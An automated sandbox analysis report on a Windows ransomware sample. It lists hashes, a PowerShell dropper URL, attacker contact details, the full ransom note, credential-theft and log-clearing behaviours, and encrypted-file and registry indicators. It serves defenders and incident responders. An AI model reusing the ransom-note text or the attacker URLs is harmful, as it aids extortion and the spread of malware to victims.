39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6

Analysis

max time kernel
149s
max time network
155s
platform
windows10_x64
resource
win10v20210410
submitted
16-05-2021 03:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
Size

2.7MB
MD5

631101614bb5dac04fed6a14470b045e
SHA1

8a5b126a8d49865551a993166c070aed739bcddb
SHA256

39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6
SHA512

e60c799a16b27425ef038723d81fb03c0bd39dc8b5b217201a26ccf9bc1e8d9cd1f7e232c5a29bd7808e5eacf67b07e0c873b2af9ef8e41e3b04d5875aca81ee

Score

10^/10

evasion ransomware spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://moonlightkrippe.ch/DesktopModules/Journal/clear.txt

Extracted

Path

C:\Decrypt_files.txt

Ransom Note

++++++++++++++++++++++++++++++++ Hack For Mandatory Security ++++++++++++++++++++++++++++++++ All Your Files Has Been Locked! If you think you can decrypt the files we would be happy :) But all your files are protected by strong encryption with AES RSA 256 using military-grade encryption algorithm Video Decrypt: Due to the deletion of video on video sharing sites You can download and watch the video from the link below: ++++++++ https://drive.google.com/file/d/1QAhLOX-sQuyjk31LPPpseRlhaLKEZ_t7/view ++++++++ What does this mean ? This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them. You Can Send some Files that not Contains Valuable Data To make Sure That Your Files Can be Back with our Tool Your unique Id : LRAVBCRGKBPFMESS Contact : [email protected] or https://t.me/Decrypt8070 What are the guarantees that I can decrypt my files after paying the ransom? Your main guarantee is the ability to decrypt test files. This means that we can decrypt all your files after paying the ransom. We have no reason to deceive you after receiving the ransom, since we are not barbarians and moreover it will harm our business. You Have 2days to Decide to Pay after 2 Days Decryption Price will Be Double And after 1 week it will be triple Try to Contact late and You will know Therefore, we recommend that you make payment within a few hours. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Again, we emphasize that no one can decrypt files, so don't be a victim of fraud. It's just a business Warning : If you email us late You may miss the Decrypt program Because our emails are blocked quickly So it is better as soon as they read email Email us ;) You can buy bitcoins from the following sites https://crypto.com https://www.binance.com https://www.coinbase.com/ https://localbitcoins.com/buy_bitcoins https://www.coindesk.com/information/how-can-i-buy-bitcoins ++++++++++++++++++++++++++++++++ Hack For Mandatory Security ++++++++++++++++++++++++++++++++

Emails

[email protected]

URLs

https://drive.google.com/file/d/1QAhLOX-sQuyjk31LPPpseRlhaLKEZ_t7/view

https://t.me/Decrypt8070

https://crypto.com

https://www.binance.com

Extracted

Path

C:\Users\Admin\Desktop\Decrypt_files.txt

Ransom Note

Emails

[email protected]

URLs

https://drive.google.com/file/d/1QAhLOX-sQuyjk31LPPpseRlhaLKEZ_t7/view

https://t.me/Decrypt8070

https://crypto.com

https://www.binance.com

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\Decrypt_files.txt

Ransom Note

++++++++++++++++++++++++++++++++ Hack For Mandatory Security ++++++++++++++++++++++++++++++++ All Your Files Has Been Locked! If you think you can decrypt the files we would be happy :) But all your files are protected by strong encryption with AES RSA 256 using military-grade encryption algorithm Video Decrypt: Due to the deletion of video on video sharing sites You can download and watch the video from the link below: ++++++++ https://drive.google.com/file/d/1QAhLOX-sQuyjk31LPPpseRlhaLKEZ_t7/view ++++++++ What does this mean ? This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them. You Can Send some Files that not Contains Valuable Data To make Sure That Your Files Can be Back with our Tool Your unique Id : LRAVBCRGKBPFMESS Contact : [email protected] or https://t.me/Decrypt8070 What are the guarantees that I can decrypt my files after paying the ransom? Your main guarantee is the ability to decrypt test files. This means that we can decrypt all your files after paying the ransom. We have no reason to deceive you after receiving the ransom, since we are not barbarians and moreover it will harm our business. You Have 2days to Decide to Pay after 2 Days Decryption Price will Be Double And after 1 week it will be triple Try to Contact late and You will know Therefore, we recommend that you make payment within a few hours. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Again, we emphasize that no one can decrypt files, so don't be a victim of fraud. It's just a business Warning : If you email us late You may miss the Decrypt program Because our emails are blocked quickly So it is better as soon as they read email Email us ;) You can buy bitcoins from the following sites https://crypto.com https://www.binance.com https://www.coinbase.com/ https://localbitcoins.com/buy_bitcoins https://www.coindesk.com/information/how-can-i-buy-bitcoins >>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Hack For Security <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

Emails

[email protected]

URLs

https://drive.google.com/file/d/1QAhLOX-sQuyjk31LPPpseRlhaLKEZ_t7/view

https://t.me/Decrypt8070

https://crypto.com

https://www.binance.com

Signatures

Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

15 1344 powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
15	1344	powershell.exe

Drops file in Program Files directory 64 IoCs

Processes:

39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe

description	ioc	process
File created	C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Retail-ul-oob.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial-pl.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSOADFPS.DLL.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jre1.8.0_66\bin\JAWTAccessBridge-64.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Retail-ul-oob.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ul-oob.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\api-ms-win-core-localization-l1-2-0.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\rsod\powerpoint.x-none.msi.16.x-none.boot.tree.dat.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-ul-oob.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\mscss7en.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-pl.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\db\bin\dblook.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-pl.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\mip_core.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\msmgdsrv.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.ELM.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial3-pl.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Office.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\PersonaSpy.js.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\msolap_xl.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\bin\java-rmi.exe.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_KMS_Client-ul-oob.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_OEM_Perp-ul-phn.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-180.png.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Retail-pl.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-pl.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_COL.HXC.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Grace-ppd.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-pl.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART11.BDR.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\jfxrt.jar.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT-Rockwell.xml.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-ppd.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial4-pl.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription2-ul-oob.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\TellMeExcel.nrr.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-ppd.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCHART.DLL.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-100.png.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.HostIntegration.Connectors.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL103.XML.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Grace-ppd.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_WHATSNEW.XML.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.Tabular.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzdb.dat.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Grace-ppd.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\WordVL_KMS_Client-ppd.xrm-ms.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dll.Email=[[email protected]]ID=[LRAVBCRGKBPFMESS].Encrypt	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SearchUI.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3564 taskkill.exe
732 taskkill.exe
2316 taskkill.exe
2468 taskkill.exe

pid	process
3564	taskkill.exe
732	taskkill.exe
2316	taskkill.exe
2468	taskkill.exe

Modifies registry class 53 IoCs

Processes:

SearchUI.exereg.exerundll32.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "364"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total\ = "0"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\MrtCache	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheLimit = "51200"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Encrypt\DefaultIcon\ = "C:\\Windows\\System32\\SHELL32.dll,134"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana\NumberOfSubdomains = "0"	SearchUI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.Encrypt\DefaultIcon	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CacheLimit = "1"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23"	SearchUI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.Encrypt	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "364"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
